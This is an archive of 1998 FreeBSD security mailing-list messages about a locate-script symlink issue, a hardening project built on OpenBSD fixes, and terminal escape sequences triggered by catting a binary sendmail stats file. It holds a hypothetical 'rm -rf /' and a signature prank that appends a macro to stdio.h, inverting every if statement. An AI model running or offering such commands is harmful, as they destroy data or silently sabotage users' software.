From owner-freebsd-security Tue Sep 8 14:51:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA19660 for freebsd-security-outgoing; Tue, 8 Sep 1998 14:51:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-057.dublin.indigo.ie [194.125.134.187]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA19651 for ; Tue, 8 Sep 1998 14:51:26 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA00732; Tue, 8 Sep 1998 22:45:00 +0100 (IST) (envelope-from rotel@indigo.ie) 
From: Niall Smart Message-Id: <199809082145.WAA00732@indigo.ie> Date: Tue, 8 Sep 1998 22:45:00 +0000 In-Reply-To: ; Nicholas Charles Brawn Reply-To: rotel@indigo.ie X-Files: The truth is out there X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Nicholas Charles Brawn , freebsd-security@FreeBSD.ORG Subject: Re: Symlinks again... Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 23, 4:09pm, Nicholas Charles Brawn wrote: } Subject: Symlinks again... > Another symlink problem. > > The script /usr/libexec/locate.updatedb and /usr/libexec/locate.mklocatedb > create predictable filenames in /tmp. Example attack is shown below. Bah, I sent in patches for this ages ago (6, 7 months?) in a PR, obviously everyone's too busy to care about security. Niall -- Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 8 14:59:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA21074 for freebsd-security-outgoing; Tue, 8 Sep 1998 14:59:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-057.dublin.indigo.ie [194.125.134.187]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA21069 for ; Tue, 8 Sep 1998 14:59:41 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA00764 for freebsd-security@freebsd.org; Tue, 8 Sep 1998 22:53:30 +0100 (IST) (envelope-from rotel@indigo.ie) 
From: Niall Smart
Message-Id: <199809082153.WAA00764@indigo.ie>
Date: Tue, 8 Sep 1998 22:53:30 +0000
Reply-To: rotel@indigo.ie
X-Files: The truth is out there
X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96)
To: freebsd-security@FreeBSD.ORG
Subject: oops.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

eh, ignore that last message, it's a 6 month one and the relevant fixes are already in.

Niall
--
Niall Smart, rotel@indigo.ie. Amaze your friends and annoy your enemies:
echo '#define if(x) if (!(x))' >> /usr/include/stdio.h

From owner-freebsd-security Wed Sep 9 17:42:05 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA19718 for freebsd-security-outgoing; Wed, 9 Sep 1998 17:42:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA19700; Wed, 9 Sep 1998 17:42:03 -0700 (PDT) (envelope-from enkhyl@hayseed.net)
Received: from hillbilly.hayseed.net (enkhyl@hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id RAA09311; Wed, 9 Sep 1998 17:44:40 -0700
Date: Wed, 9 Sep 1998 17:44:39 -0700 (PDT)
From: Enkhyl To: security@FreeBSD.ORG cc: current@FreeBSD.ORG Subject: FreeBSD Hardening Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Back when the popper buffer overflow bug sprang forth it was suggested that it might be a good idea to go through the OpenBSD change logs and evaluate security-related fixes for inclusion in FreeBSD. Is there anyone actively working on this? If there is a project organized around this, I'm willing to help out with the endeavor. Otherwise, I'm willing to embark on this endeavor and make a project out of it. Comments? -- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 17:57:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA21983 for freebsd-security-outgoing; Wed, 9 Sep 1998 17:57:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA21957; Wed, 9 Sep 1998 17:57:48 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.1/8.8.8) with ESMTP id SAA02559; Wed, 9 Sep 1998 18:03:55 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Message-Id: <199809100103.SAA02559@dingo.cdrom.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Enkhyl cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-reply-to: Your message of "Wed, 09 Sep 1998 17:44:39 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 09 Sep 1998 18:03:55 -0700 
From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Back when the popper buffer overflow bug sprang forth it was suggested > that it might be a good idea to go through the OpenBSD change logs and > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > actively working on this? If there is a project organized around this, I'm > willing to help out with the endeavor. Otherwise, I'm willing to embark on > this endeavor and make a project out of it. There are at least a couple of people doing this on a casual basis. Having a "process owner" would probably be an excellent idea. Go do it! -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 19:08:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA04019 for freebsd-security-outgoing; Wed, 9 Sep 1998 19:08:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA03998; Wed, 9 Sep 1998 19:08:21 -0700 (PDT) (envelope-from enkhyl@hayseed.net) Received: from hillbilly.hayseed.net (enkhyl@hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id TAA09588; Wed, 9 Sep 1998 19:10:52 -0700 Date: Wed, 9 Sep 1998 19:10:52 -0700 (PDT) 
From: Enkhyl To: Mike Smith cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: <199809100103.SAA02559@dingo.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, Mike Smith wrote: > > Back when the popper buffer overflow bug sprang forth it was suggested > > that it might be a good idea to go through the OpenBSD change logs and > > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > > actively working on this? If there is a project organized around this, I'm > > willing to help out with the endeavor. Otherwise, I'm willing to embark on > > this endeavor and make a project out of it. > > There are at least a couple of people doing this on a casual basis. > Having a "process owner" would probably be an excellent idea. > > Go do it! And away we go... I'll see if I can manage to get a mailing list together to organize the effort and divide up the work (anyone have a server I can host the list on? :-) Anyone that is casually working on this, please speak up so that we can "projectize" this. Thanks! 
-- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 19:53:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA13701 for freebsd-security-outgoing; Wed, 9 Sep 1998 19:53:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA13687; Wed, 9 Sep 1998 19:52:57 -0700 (PDT) (envelope-from obrien@NUXI.com) Received: (from obrien@localhost) by relay.nuxi.com (8.8.8/8.6.12) id TAA04607; Wed, 9 Sep 1998 19:52:35 -0700 (PDT) Message-ID: <19980909195235.A4400@nuxi.com> Date: Wed, 9 Sep 1998 19:52:35 -0700 
From: "David O'Brien" To: Enkhyl , security@FreeBSD.ORG Cc: current@FreeBSD.ORG Subject: Re: FreeBSD Hardening Reply-To: obrien@NUXI.com References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Enkhyl on Wed, Sep 09, 1998 at 05:44:39PM -0700 X-Operating-System: FreeBSD 2.2.7-STABLE Organization: The NUXI BSD group X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone see http://www.freebsd.org/auditors.html and http://www.watson.org/fbsd-hardening/index.html -- -- David (obrien@NUXI.ucdavis.edu -or- obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 9 23:22:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA07626 for freebsd-security-outgoing; Wed, 9 Sep 1998 23:22:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-25.igrin.co.nz [202.49.245.104]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA07602; Wed, 9 Sep 1998 23:22:33 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id PAA01986; Thu, 10 Sep 1998 15:10:30 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Thu, 10 Sep 1998 15:10:30 +1200 (NZST) 
From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Enkhyl cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, Enkhyl wrote: > Back when the popper buffer overflow bug sprang forth it was suggested > that it might be a good idea to go through the OpenBSD change logs and > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > actively working on this? If there is a project organized around this, I'm > willing to help out with the endeavor. Otherwise, I'm willing to embark on > this endeavor and make a project out of it. > > Comments? I think this one got lost a bit about the point when someone tried to make an issue of the qualifications of contributors. Someone correct me if I'm wrong. To get to a point where you can declare a piece of code correct is a difficult thing to do, and is prone to getting it wrong. To find something that needs fixing generally isn't all that difficult. 
Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 04:07:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA09265 for freebsd-security-outgoing; Thu, 10 Sep 1998 04:07:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA09260 for ; Thu, 10 Sep 1998 04:07:19 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id MAA19354 for ; Thu, 10 Sep 1998 12:07:07 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id MAA01163 for ; Thu, 10 Sep 1998 12:07:05 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Thu, 10 Sep 1998 12:07:05 +0100 (BST) 
From: Jay Tribick
X-Sender: netadmin@bofh.fast.net.uk
To: freebsd-security@FreeBSD.ORG
Subject: Err.. cat exploit.. (!)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi All..

Was just having a look in /var/log the other day and spotted a file called sendmail.st, wondering what it was I cat'd it and here's what it did:

bofh$ cat sendmail.st
`ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm
su: xtermxterm: command not found
bofh$

This seems quite scary to me, couldn't someone embed 'rm -rf /' within a text file and then, if root cats the file it nukes their system?

Here's an 'od' dump of the file, unfortunately I don't have the time to investigate this further:

bofh$ od sendmail.st
0000000 130736 000001 000002 000000 177032 032616 001150 000000
0000020 000000 000000 000000 000000 000000 000000 175721 000000
0000040 000000 000000 173327 000003 000000 000000 000000 000000
0000060 000000 000000 000000 000000 000000 000000 000000 000000
*
0000200 170546 000063 000000 000000 025063 000203 000000 000000
0000220 000000 000000 000000 000000 000000 000000 000000 000000
*
0000320 000000 000000 000000 000000 000741 000000 130255 000000
0000340 000000 000000 066405 000002 000000 000000 174575 000001
0000360 000000 000000 000000 000000 000000 000000 000000 000000
*
0000460 000000 000000 000000 000000 000000 000000 007734 000000
0000500 132451 000001 000000 000000 170650 000112 000000 000000
0000520 065262 000135 000000 000000 000000 000000 000000 000000
0000540 000000 000000 000000 000000 000000 000000 000000 000000
*
0000640 000000 000000 000000 000000 000000 000000 004472 000000
0000660 000000 000000 045005 000000 000000 000000 000000 000000
0000700 000000 000000 000000 000000 000000 000000 000000 000000
*
0001140
bofh$ uname -a
FreeBSD server1.fastnet.co.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Mon Jun 22 17:33:00 BST 1998
kronus@anarchy.fast.net.uk:/usr/src/sys/compile/ANARCHY i386

Regards,

Jay Tribick
--
[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Thu Sep 10 05:04:30 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA14131 for freebsd-security-outgoing; Thu, 10 Sep 1998 05:04:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.128.94.182]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA14126; Thu, 10 Sep 1998 05:04:28 -0700 (PDT) (envelope-from software@kew.com)
Received: from sonata.hh.kew.com (root@sonata-dmz.hh.kew.com [192.168.205.1]) by kendra.ne.mediaone.net (8.8.8/8.8.8) with ESMTP id IAA10434; Thu, 10 Sep 1998 08:04:19 -0400 (EDT) (envelope-from software@kew.com)
Received: from ffactory.uucp.kew.com (ffactory.hh.kew.com [192.168.203.131]) by sonata.hh.kew.com (8.9.1/8.9.1) with SMTP id IAA18208; Thu, 10 Sep 1998 08:04:17 -0400 (EDT)
Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with UUCP for multiple addressees; Thu, 10 Sep 1998 08:04:17 -0500
Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with ESMTP for multiple addresses; Wed, 09 Sep 1998 23:44:09 -0500
Message-ID: <35F74B09.83E802C4@kew.com>
Date: Wed, 09 Sep 1998 23:44:09 -0400
From: Drew Derbyshire Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) X-Mailer: Mozilla 4.05 [en] (WinNT; U) MIME-Version: 1.0 To: Enkhyl CC: Mike Smith , security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Enkhyl wrote: > And away we go... > > I'll see if I can manage to get a mailing list together to organize the > effort and divide up the work (anyone have a server I can host the list > on? :-) > > Anyone that is casually working on this, please speak up so that we can > "projectize" this. One would hope that the regular freebsd.org mail server could host it, but if not, I believe we (kew.com) can. -- Drew Derbyshire UUPC/extended e-mail: software@kew.com Telephone: 617-279-9812 "And you will always know that they existed - once. That you discovered - once. Held them in your hands - once. And then lost them - forever." -- Lon, Snakedance:3 (Dr. Who?) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 06:44:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA25439 for freebsd-security-outgoing; Thu, 10 Sep 1998 06:44:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA25397 for ; Thu, 10 Sep 1998 06:43:46 -0700 (PDT) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.8.8/8.8.8) id OAA11271; Thu, 10 Sep 1998 14:43:25 +0100 (BST) (envelope-from joe) Message-ID: <19980910144324.B831@pavilion.net> Date: Thu, 10 Sep 1998 14:43:24 +0100 
From: Josef Karthauser To: Jay Tribick , freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) Mail-Followup-To: Jay Tribick , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Jay Tribick on Thu, Sep 10, 1998 at 12:07:05PM +0100 X-NCC-RegID: uk.pavilion Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 12:07:05PM +0100, Jay Tribick wrote: > > bofh$ cat sendmail.st > `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm > su: xtermxterm: command not found > bofh$ I've noticed this also. Catting some binaries (by accident of course) seems to interact with the terminal badly!! This is on an 'rxvt' running bash. Joe -- Josef Karthauser Technical Manager FreeBSD: The power to serve (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 06:44:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA25605 for freebsd-security-outgoing; Thu, 10 Sep 1998 06:44:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net ([207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA25597 for ; Thu, 10 Sep 1998 06:44:54 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id IAA20118; Thu, 10 Sep 1998 08:44:39 -0500 (CDT) Received: from klinzhai-39.isdn.mke.execpc.com(169.207.65.167) by peak.mountin.net via smap (V1.3) id sma020116; Thu Sep 10 08:44:22 1998 Message-Id: <3.0.3.32.19980910084313.011f48f0@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Thu, 10 Sep 1998 08:43:13 -0500 To: Jay Tribick , 
freebsd-security@FreeBSD.ORG 
From: "Jeffrey J. Mountin"
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 12:07 PM 9/10/98 +0100, Jay Tribick wrote:
>
>Hi All..
>
>Was just having a look in /var/log the other day and spotted
>a file called sendmail.st, wondering what it was I cat'd it
>and here's what it did:
>
>bofh$ cat sendmail.st
>`ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm
>su: xtermxterm: command not found
>bofh$
>
>This seems quite scarey to me, couldn't someone embed 'rm -rf /'
>within a text file and then, if root cats the file it nukes
>their system?
>
>Here's an 'od' dump of the file, unfortunately I don't have the
>time to investigate this further:
>
>bofh$ od sendmail.st
--snip--
>
>bofh$ uname -a
>FreeBSD server1.fastnet.co.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0: Mon
>Jun 22 17:33:00 BST 1998
>kronus@anarchy.fast.net.uk:/usr/src/sys/compile/ANARCHY i386

It is a binary file.

The sendmail.st file is used for mailer stats for sendmail, a la mailstats:

# mailstats
Statistics from Thu Sep 3 05:10:01 1998
 M   msgsfr  bytes_from   msgsto    bytes_to  msgsrej  msgsdis  Mailer
 3     2060       6227K       45         60K        0        0  local
 5        0          0K     2073       6207K        0        0  esmtp
=============================================================
 T     2060       6227K     2118       6267K        0        0

Terminals don't like it when you cat a binary.

Jeff Mountin - Unix Systems TCP/IP networking
jeff@mountin.net

From owner-freebsd-security Thu Sep 10 06:53:30 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA27192 for freebsd-security-outgoing; Thu, 10 Sep 1998 06:53:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA27187 for ; Thu, 10 Sep 1998 06:53:24 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk)
Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id OAA28973 for ; Thu, 10 Sep 1998 14:53:12 +0100 (BST)
Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id OAA01639 for ; Thu, 10 Sep 1998 14:53:10 +0100 (BST) (envelope-from netadmin@fastnet.co.uk)
Date: Thu, 10 Sep 1998 14:53:10 +0100 (BST)
From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) In-Reply-To: <3.0.3.32.19980910084313.011f48f0@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | >Was just having a look in /var/log the other day and spotted | >a file called sendmail.st, wondering what it was I cat'd it | >and here's what it did: | > | >bofh$ cat sendmail.st | >`ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm | >su: xtermxterm: command not found | >bofh$ | > | >This seems quite scarey to me, couldn't someone embed 'rm -rf /' | >within a text file and then, if root cats the file it nukes | >their system? | > | >Here's an 'od' dump of the file, unfortunately I don't have the | >time to investigate this further: | > | >bofh$ od sendmail.st | --snip-- | | It is a binary file. | | The sendmail.st file is used for mailer stats for sendmail ala mailstats: | | # mailstats | Statistics from Thu Sep 3 05:10:01 1998 | M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer | 3 2060 6227K 45 60K 0 0 local | 5 0 0K 2073 6207K 0 0 esmtp | ============================================================= | T 2060 6227K 2118 6267K 0 0 | | Terminals don't like it when you cat a binary. It's not the fact that it was a binary that puzzled me but that it had managed to execute a command on the shell just by me cat'ing the file. Forgot to mention that it was in an xterm and doesn't affect Virtual Consoles. 
Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 07:11:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA29678 for freebsd-security-outgoing; Thu, 10 Sep 1998 07:11:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from t15.tempest.sk (t15.tempest.sk [195.28.96.15]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA29661 for ; Thu, 10 Sep 1998 07:11:00 -0700 (PDT) (envelope-from ludo_koren@tempest.sk) Received: (from koren@localhost) by t15.tempest.sk (8.8.8/8.8.8) id QAA01396; Thu, 10 Sep 1998 16:04:06 +0200 (CEST) (envelope-from koren) Date: Thu, 10 Sep 1998 16:04:06 +0200 (CEST) Message-Id: <199809101404.QAA01396@t15.tempest.sk> 
From: Ludo Koren To: netadmin@fastnet.co.uk CC: freebsd-security@FreeBSD.ORG In-reply-to: (message from Jay Tribick on Thu, 10 Sep 1998 12:07:05 +0100 (BST)) Subject: Re: Err.. cat exploit.. (!) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Jay" == Jay Tribick writes: Jay> Was just having a look in /var/log the other day and spotted Jay> a file called sendmail.st, wondering what it was I cat'd it sendmail maintains an ongoing record of total number and sizes of all outgoing and incoming mail messages in sendmail.st use mailstats (8) to view it. ludo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 07:24:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA02579 for freebsd-security-outgoing; Thu, 10 Sep 1998 07:24:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.128.94.182]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA02573 for ; Thu, 10 Sep 1998 07:24:46 -0700 (PDT) (envelope-from software@kew.com) Received: from sonata.hh.kew.com (root@sonata-dmz.hh.kew.com [192.168.205.1]) by kendra.ne.mediaone.net (8.8.8/8.8.8) with ESMTP id IAA10476; Thu, 10 Sep 1998 08:23:06 -0400 (EDT) (envelope-from software@kew.com) Received: from ffactory.uucp.kew.com (ffactory.hh.kew.com [192.168.203.131]) by sonata.hh.kew.com (8.9.1/8.9.1) with SMTP id IAA18277; Thu, 10 Sep 1998 08:23:05 -0400 (EDT) Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with UUCP for multiple addressees; Thu, 10 Sep 1998 08:23:05 -0500 Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with ESMTP for multiple addresses; Thu, 10 Sep 1998 08:23:03 -0500 Message-ID: <35F7C4A7.12C2A1C7@kew.com> Date: Thu, 10 Sep 1998 08:23:03 -0400 
From: Drew Derbyshire
Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com)
X-Mailer: Mozilla 4.05 [en] (WinNT; U)
MIME-Version: 1.0
To: Jay Tribick
CC: freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jay Tribick wrote:

> Was just having a look in /var/log the other day and spotted
> a file called sendmail.st, wondering what it was I cat'd it
> and here's what it did:

Quote without comment ...

MAILSTATS(8)            FreeBSD System Manager's Manual           MAILSTATS(8)

NAME
     mailstats - display mail protocol statistics

SYNOPSIS
     mailstats [-o] [-C sendmail.cf] [-f sendmail.st]

DESCRIPTION
     Mailstats displays mail statistics on a per mailer basis.  Each line of
     output contains the mailer number, the count and byte-count of incoming
     messages, the count and byte-count of outgoing messages, and the name of
     the mailer unless the -o flag is specified.  Common mailers include smtp
     and local (eg: mail.local, the program which handles local delivery of
     mail).

     Statistics are read from the sendmail statistics file sendmail.st, the
     location of which is defined in sendmail.cf, or specified with the -f
     flag.  Mailers are likewise defined in the sendmail.cf file.

     Statistics are cumulative; zero the statistics file to reset the
     counters.

FILES
     /etc/sendmail.cf      sendmail configuration file
     /var/log/sendmail.st  sendmail statistics file

SEE ALSO
     mail.local(8), sendmail(8)

BSD                            August 13, 1996                               1
of the message

--
Drew Derbyshire UUPC/extended e-mail: software@kew.com Telephone: 617-279-9812
"For every bug fixed, there is a bigger bug not yet discovered."

From owner-freebsd-security Thu Sep 10 07:26:22 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA02939 for freebsd-security-outgoing; Thu, 10 Sep 1998 07:26:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
